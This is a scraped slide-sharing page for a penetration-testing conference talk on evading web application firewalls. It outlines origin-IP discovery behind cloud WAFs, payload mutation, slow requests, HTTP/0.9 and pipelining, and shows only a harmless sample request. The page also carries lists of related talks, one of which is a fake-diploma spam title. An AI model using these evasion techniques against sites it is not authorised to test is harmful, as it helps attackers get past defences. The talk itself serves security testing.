References 1/2 • http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf • http://www.ussrback.com/docs/papers/IDS/whiskerids.html • https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON- 24-Regilero-Hiding-Wookiees-In-Http.pdf • https://securityvulns.ru/advisories/content.asp • https://dl.packetstormsecurity.net/papers/general/whitepaper_httpresponse.pdf • https://cdivilly.wordpress.com/2011/04/22/java-servlets-uri-parameters/ • https://msdn.microsoft.com/en-us/library/system.text.encodinginfo.getencoding.aspx • http://securitee.org/files/cloudpiercer_ccs2015.pdf • https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/request- encoding-to-bypass-web-application-firewalls/
References 2/2 • https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet- request-validation-bypass-using-request-encoding/ • https://www.rootusers.com/find-the-ip-address-of-a-website-behind-cloudflare/ • https://www.ericzhang.me/resolve-cloudflare-ip-leakage/ • https://community.akamai.com/community/web-performance/blog/2015/03/31/using-akamai- pragma-headers-to-investigate-or-troubleshoot-akamai-content-delivery • https://soroush.secproject.com/blog/2010/08/noscript-new-bypass-method-by-unicode-in-asp/ • https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html
Ad

Recommended

Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
Frans Rosén
 
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowdCVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd
Casey Ellis
 
Smart Door locking system using arduino
Smart Door locking system using arduinoSmart Door locking system using arduino
Smart Door locking system using arduino
BhawnaSingh351973
 
Black Ops of TCP/IP 2011 (Black Hat USA 2011)
Black Ops of TCP/IP 2011 (Black Hat USA 2011)Black Ops of TCP/IP 2011 (Black Hat USA 2011)
Black Ops of TCP/IP 2011 (Black Hat USA 2011)
Dan Kaminsky
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
Ivan Novikov
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
Mikhail Egorov
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Frans Rosén
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
neexemil
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
 
HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021
neexemil
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
Mikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 
Http
HttpHttp
Http
Eri Alam
 
Web technologies: HTTP
Web technologies: HTTPWeb technologies: HTTP
Web technologies: HTTP
Piero Fraternali
 

More Related Content

What's hot (20)

Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
Ivan Novikov
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
Mikhail Egorov
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Frans Rosén
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
neexemil
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
 
HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021
neexemil
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
Mikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Lie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application FirewallsLie to Me: Bypassing Modern Web Application Firewalls
Lie to Me: Bypassing Modern Web Application Firewalls
Ivan Novikov
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
Mikhail Egorov
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Frans Rosén
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versions
neexemil
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
 
HotPics 2021
HotPics 2021HotPics 2021
HotPics 2021
neexemil
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
Mikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 

Similar to WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour (20)

Http
HttpHttp
Http
Eri Alam
 
Web technologies: HTTP
Web technologies: HTTPWeb technologies: HTTP
Web technologies: HTTP
Piero Fraternali
 
Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014
Navaneethan Naveen
 
From zero to almost rails in about a million slides...
From zero to almost rails in about a million slides...From zero to almost rails in about a million slides...
From zero to almost rails in about a million slides...
david_e_worth
 
Communicating on the web
Communicating on the webCommunicating on the web
Communicating on the web
Adrian Cardenas
 
Web Application Security 101 - 02 The Basics
Web Application Security 101 - 02 The BasicsWeb Application Security 101 - 02 The Basics
Web Application Security 101 - 02 The Basics
Websecurify
 
Cgi
CgiCgi
Cgi
AkramWaseem
 
WAF protections and bypass resources
WAF protections and bypass resourcesWAF protections and bypass resources
WAF protections and bypass resources
Antonio Costa aka Cooler_
 
Http Status Report
Http Status ReportHttp Status Report
Http Status Report
ConSanFrancisco123
 
HTTP Request and Response Structure
HTTP Request and Response StructureHTTP Request and Response Structure
HTTP Request and Response Structure
BhagyashreeGajera1
 
CGI by rj
CGI by rjCGI by rj
CGI by rj
Shree M.L.Kakadiya MCA mahila college, Amreli
 
HTTP
HTTPHTTP
HTTP
MaeEstherMaguadMaralit
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testing
Tomas Doran
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testing
Tomas Doran
 
Servlets http-status-codes
Servlets http-status-codesServlets http-status-codes
Servlets http-status-codes
Rachana Joshi
 
Webbasics
WebbasicsWebbasics
Webbasics
patinijava
 
Http - All you need to know
Http - All you need to knowHttp - All you need to know
Http - All you need to know
Gökhan Şengün
 
[DSBW Spring 2009] Unit 02: Web Technologies (2/2)
[DSBW Spring 2009] Unit 02: Web Technologies (2/2)[DSBW Spring 2009] Unit 02: Web Technologies (2/2)
[DSBW Spring 2009] Unit 02: Web Technologies (2/2)
Carles Farré
 
HTTPs Strict Transport Security
HTTPs Strict Transport Security HTTPs Strict Transport Security
HTTPs Strict Transport Security
Gol D Roger
 
When RSS Fails: Web Scraping with HTTP
When RSS Fails: Web Scraping with HTTPWhen RSS Fails: Web Scraping with HTTP
When RSS Fails: Web Scraping with HTTP
Matthew Turland
 
Http
HttpHttp
Http
Eri Alam
 
Web technologies: HTTP
Web technologies: HTTPWeb technologies: HTTP
Web technologies: HTTP
Piero Fraternali
 
Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014
Navaneethan Naveen
 
From zero to almost rails in about a million slides...
From zero to almost rails in about a million slides...From zero to almost rails in about a million slides...
From zero to almost rails in about a million slides...
david_e_worth
 
Communicating on the web
Communicating on the webCommunicating on the web
Communicating on the web
Adrian Cardenas
 
Web Application Security 101 - 02 The Basics
Web Application Security 101 - 02 The BasicsWeb Application Security 101 - 02 The Basics
Web Application Security 101 - 02 The Basics
Websecurify
 
Cgi
CgiCgi
Cgi
AkramWaseem
 
WAF protections and bypass resources
WAF protections and bypass resourcesWAF protections and bypass resources
WAF protections and bypass resources
Antonio Costa aka Cooler_
 
Http Status Report
Http Status ReportHttp Status Report
Http Status Report
ConSanFrancisco123
 
HTTP Request and Response Structure
HTTP Request and Response StructureHTTP Request and Response Structure
HTTP Request and Response Structure
BhagyashreeGajera1
 
CGI by rj
CGI by rjCGI by rj
CGI by rj
Shree M.L.Kakadiya MCA mahila college, Amreli
 
HTTP
HTTPHTTP
HTTP
MaeEstherMaguadMaralit
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testing
Tomas Doran
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testing
Tomas Doran
 
Servlets http-status-codes
Servlets http-status-codesServlets http-status-codes
Servlets http-status-codes
Rachana Joshi
 
Webbasics
WebbasicsWebbasics
Webbasics
patinijava
 
Http - All you need to know
Http - All you need to knowHttp - All you need to know
Http - All you need to know
Gökhan Şengün
 
[DSBW Spring 2009] Unit 02: Web Technologies (2/2)
[DSBW Spring 2009] Unit 02: Web Technologies (2/2)[DSBW Spring 2009] Unit 02: Web Technologies (2/2)
[DSBW Spring 2009] Unit 02: Web Technologies (2/2)
Carles Farré
 
HTTPs Strict Transport Security
HTTPs Strict Transport Security HTTPs Strict Transport Security
HTTPs Strict Transport Security
Gol D Roger
 
When RSS Fails: Web Scraping with HTTP
When RSS Fails: Web Scraping with HTTPWhen RSS Fails: Web Scraping with HTTP
When RSS Fails: Web Scraping with HTTP
Matthew Turland
 
Ad

Recently uploaded (17)

Networking concepts from zero to hero that covers the security aspects
Networking concepts from zero to hero that covers the security aspectsNetworking concepts from zero to hero that covers the security aspects
Networking concepts from zero to hero that covers the security aspects
amansinght675
 
Frontier Unlimited Internet Setup Step-by-Step Guide.pdf
Frontier Unlimited Internet Setup Step-by-Step Guide.pdfFrontier Unlimited Internet Setup Step-by-Step Guide.pdf
Frontier Unlimited Internet Setup Step-by-Step Guide.pdf
Internet Bundle Now
 
ARTIFICIAL INTELLIGENCE.pptx2565567765676
ARTIFICIAL INTELLIGENCE.pptx2565567765676ARTIFICIAL INTELLIGENCE.pptx2565567765676
ARTIFICIAL INTELLIGENCE.pptx2565567765676
areebaimtiazpmas
 
Transport Conjjjjjjjjjjjjjjjjjjjjjjjsulting by Slidesgo.pptx
Transport Conjjjjjjjjjjjjjjjjjjjjjjjsulting by Slidesgo.pptxTransport Conjjjjjjjjjjjjjjjjjjjjjjjsulting by Slidesgo.pptx
Transport Conjjjjjjjjjjjjjjjjjjjjjjjsulting by Slidesgo.pptx
ssuser80a7e81
 
Essential Tech Stack for Effective Shopify Dropshipping Integration.pdf
Essential Tech Stack for Effective Shopify Dropshipping Integration.pdfEssential Tech Stack for Effective Shopify Dropshipping Integration.pdf
Essential Tech Stack for Effective Shopify Dropshipping Integration.pdf
CartCoders
 
Networking_Essentials_version_3.0_-_Module_7.pptx
Networking_Essentials_version_3.0_-_Module_7.pptxNetworking_Essentials_version_3.0_-_Module_7.pptx
Networking_Essentials_version_3.0_-_Module_7.pptx
elestirmen
 
10 Latest Technologies and Their Benefits to End.pptx
10 Latest Technologies and Their Benefits to End.pptx10 Latest Technologies and Their Benefits to End.pptx
10 Latest Technologies and Their Benefits to End.pptx
EphraimOOghodero
 
basic to advance network security concepts
basic to advance network security conceptsbasic to advance network security concepts
basic to advance network security concepts
amansinght675
 
all Practical Project LAST summary note.docx
all Practical Project LAST summary note.docxall Practical Project LAST summary note.docx
all Practical Project LAST summary note.docx
seidjemal94
 
HPC_Course_Presentation_No_Images included.pptx
HPC_Course_Presentation_No_Images included.pptxHPC_Course_Presentation_No_Images included.pptx
HPC_Course_Presentation_No_Images included.pptx
naziaahmadnm
 
5 Reasons cheap WordPress hosting is costing you more | Reversed Out
5 Reasons cheap WordPress hosting is costing you more | Reversed Out5 Reasons cheap WordPress hosting is costing you more | Reversed Out
5 Reasons cheap WordPress hosting is costing you more | Reversed Out
Reversed Out Creative
 
How to Make Money as a Cam Model – Tips, Tools & Real Talk
How to Make Money as a Cam Model – Tips, Tools & Real TalkHow to Make Money as a Cam Model – Tips, Tools & Real Talk
How to Make Money as a Cam Model – Tips, Tools & Real Talk
Cam Sites Expert
 
AI REPLACING HUMANS /FATHER OF AI/BIRTH OF AI
AI REPLACING HUMANS /FATHER OF AI/BIRTH OF AIAI REPLACING HUMANS /FATHER OF AI/BIRTH OF AI
AI REPLACING HUMANS /FATHER OF AI/BIRTH OF AI
skdav34
 
OSI_Security_Architecture Computer Science.pptx
OSI_Security_Architecture Computer Science.pptxOSI_Security_Architecture Computer Science.pptx
OSI_Security_Architecture Computer Science.pptx
faizanaseem873
 
原版西班牙马拉加大学毕业证(UMA毕业证书)如何办理
原版西班牙马拉加大学毕业证(UMA毕业证书)如何办理原版西班牙马拉加大学毕业证(UMA毕业证书)如何办理
原版西班牙马拉加大学毕业证(UMA毕业证书)如何办理
Taqyea
 
Cloud VPS Provider in India: The Best Hosting Solution for Your Business
Cloud VPS Provider in India: The Best Hosting Solution for Your BusinessCloud VPS Provider in India: The Best Hosting Solution for Your Business
Cloud VPS Provider in India: The Best Hosting Solution for Your Business
DanaJohnson510230
 
Presentation About The Buttons | Selma SALTIK
Presentation About The Buttons | Selma SALTIKPresentation About The Buttons | Selma SALTIK
Presentation About The Buttons | Selma SALTIK
SELMA SALTIK
 
Networking concepts from zero to hero that covers the security aspects
Networking concepts from zero to hero that covers the security aspectsNetworking concepts from zero to hero that covers the security aspects
Networking concepts from zero to hero that covers the security aspects
amansinght675
 
Frontier Unlimited Internet Setup Step-by-Step Guide.pdf
Frontier Unlimited Internet Setup Step-by-Step Guide.pdfFrontier Unlimited Internet Setup Step-by-Step Guide.pdf
Frontier Unlimited Internet Setup Step-by-Step Guide.pdf
Internet Bundle Now
 
ARTIFICIAL INTELLIGENCE.pptx2565567765676
ARTIFICIAL INTELLIGENCE.pptx2565567765676ARTIFICIAL INTELLIGENCE.pptx2565567765676
ARTIFICIAL INTELLIGENCE.pptx2565567765676
areebaimtiazpmas
 
Transport Conjjjjjjjjjjjjjjjjjjjjjjjsulting by Slidesgo.pptx
Transport Conjjjjjjjjjjjjjjjjjjjjjjjsulting by Slidesgo.pptxTransport Conjjjjjjjjjjjjjjjjjjjjjjjsulting by Slidesgo.pptx
Transport Conjjjjjjjjjjjjjjjjjjjjjjjsulting by Slidesgo.pptx
ssuser80a7e81
 
Essential Tech Stack for Effective Shopify Dropshipping Integration.pdf
Essential Tech Stack for Effective Shopify Dropshipping Integration.pdfEssential Tech Stack for Effective Shopify Dropshipping Integration.pdf
Essential Tech Stack for Effective Shopify Dropshipping Integration.pdf
CartCoders
 
Networking_Essentials_version_3.0_-_Module_7.pptx
Networking_Essentials_version_3.0_-_Module_7.pptxNetworking_Essentials_version_3.0_-_Module_7.pptx
Networking_Essentials_version_3.0_-_Module_7.pptx
elestirmen
 
10 Latest Technologies and Their Benefits to End.pptx
10 Latest Technologies and Their Benefits to End.pptx10 Latest Technologies and Their Benefits to End.pptx
10 Latest Technologies and Their Benefits to End.pptx
EphraimOOghodero
 
basic to advance network security concepts
basic to advance network security conceptsbasic to advance network security concepts
basic to advance network security concepts
amansinght675
 
all Practical Project LAST summary note.docx
all Practical Project LAST summary note.docxall Practical Project LAST summary note.docx
all Practical Project LAST summary note.docx
seidjemal94
 
HPC_Course_Presentation_No_Images included.pptx
HPC_Course_Presentation_No_Images included.pptxHPC_Course_Presentation_No_Images included.pptx
HPC_Course_Presentation_No_Images included.pptx
naziaahmadnm
 
5 Reasons cheap WordPress hosting is costing you more | Reversed Out
5 Reasons cheap WordPress hosting is costing you more | Reversed Out5 Reasons cheap WordPress hosting is costing you more | Reversed Out
5 Reasons cheap WordPress hosting is costing you more | Reversed Out
Reversed Out Creative
 
How to Make Money as a Cam Model – Tips, Tools & Real Talk
How to Make Money as a Cam Model – Tips, Tools & Real TalkHow to Make Money as a Cam Model – Tips, Tools & Real Talk
How to Make Money as a Cam Model – Tips, Tools & Real Talk
Cam Sites Expert
 
AI REPLACING HUMANS /FATHER OF AI/BIRTH OF AI
AI REPLACING HUMANS /FATHER OF AI/BIRTH OF AIAI REPLACING HUMANS /FATHER OF AI/BIRTH OF AI
AI REPLACING HUMANS /FATHER OF AI/BIRTH OF AI
skdav34
 
OSI_Security_Architecture Computer Science.pptx
OSI_Security_Architecture Computer Science.pptxOSI_Security_Architecture Computer Science.pptx
OSI_Security_Architecture Computer Science.pptx
faizanaseem873
 
原版西班牙马拉加大学毕业证(UMA毕业证书)如何办理
原版西班牙马拉加大学毕业证(UMA毕业证书)如何办理原版西班牙马拉加大学毕业证(UMA毕业证书)如何办理
原版西班牙马拉加大学毕业证(UMA毕业证书)如何办理
Taqyea
 
Cloud VPS Provider in India: The Best Hosting Solution for Your Business
Cloud VPS Provider in India: The Best Hosting Solution for Your BusinessCloud VPS Provider in India: The Best Hosting Solution for Your Business
Cloud VPS Provider in India: The Best Hosting Solution for Your Business
DanaJohnson510230
 
Presentation About The Buttons | Selma SALTIK
Presentation About The Buttons | Selma SALTIKPresentation About The Buttons | Selma SALTIK
Presentation About The Buttons | Selma SALTIK
SELMA SALTIK
 
Ad

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour

  • 1. WAF Bypass Techniques Using HTTP Standard and Web Servers’ Behaviour Soroush Dalili (@irsdl), NCC Group
  • 2. Today’s Menu • HTTP smuggling like real smugglers! • Old but forgotten techniques • Eyes watering yummy HTTP requests!
  • 3. Testers’ Nightmare A simple request: “ Could you please whitelist our IP address range for this assessment? ” An unhelpful response: “ You are the hacker, figure it out yourself” Why should we whitelist you? • Not enough time! • Reduces quality • WAF effectiveness test is a separate assessment
  • 4. Where Can I Find Them?
  • 5. Whitelist vs Blacklists Whitelists ✔ • Expensive to set up • Requires application knowledge • High maintenance • Harder to break Blacklists ❌ • Quick & easy to set up • Requires minimal training • Low maintenance • Easier to break
  • 6. Side Note: WAFs in the Cloud The secret is the IP address! wait, what?! • Finding the IP address is not difficult • Historical DNS records, monitoring DNS changes, misconfigured subdomains, non-web service subdomains, SSL certificates, passive IP disclosure issues in web, code, or files, SSRF, trackbacks & pingbacks, verbose errors, debug/troubleshooting headers, enumerating IPv4 ranges, etc. [see the references] • Will be revealed sooner or later • Security via obscurity
  • 7. WAF Bypass Categories • New or missed payloads • Payload mutation and encoding techniques • Finding exceptions • Special values (e.g. headers by “Bypass WAF” Burp Suite extension) • Larger requests • Payload delivery • Request mutation
  • 9. Payload Delivery Category - Examples • Concurrency and delay • Slow requests • Multiple requests at the same time • Unsupported SSL/TLS ciphers by the WAF • HTTPS and perhaps HTTP/2 • HTTP v0.9 • HTTP-Pipelining
  • 10. HTTP v0.9 • Very old! • Supposedly one liner – only GET • No URL, No HTTP Version, No Headers • Support expectation removed in HTTP/1.1 RFC 7230 Year HTTP Version RFC 1991 0.9 1996 1.0 RFC 1945 1997 1.1 RFC 2068 -> RFC 2616 (1999) -> RFC 7230-7235 (2014) 2015 2.0 RFC 7540
  • 11. HTTP v0.9 , What Can Go Wrong? • Interpretation/implementation issues since it’s old! • Still supported by all major web servers • Absolute URL in GET request with parameters • Apache Tomcat supports headers and POST requests • Inspired further by @regilero at DEFCON 24 (Hiding Wookiees in HTTP) • I was only 1yr late to rediscover some of it, good record for me! ;-) GET http://http.ninja/?param1=value1
  • 12. Sending HTTP v0.9 What to use? • telnet • netcat • openssl • Or write your own program Client side web proxies? Not so useful  • Burp Suite can send it but usually with no response Probably blocked as a bad request by a middleware • HTTP Pipelining to the rescue
  • 13. HTTP Pipelining Pipeline Recipe • HTTP/1.1 • “Connection: close” ❌ • HTTP/1.0 • “Connection: keep-alive” ✔ • Multiple requests in one • FIFO • Hop by Hop 
  • 14. HTTP Pipelining Example 1 - Request
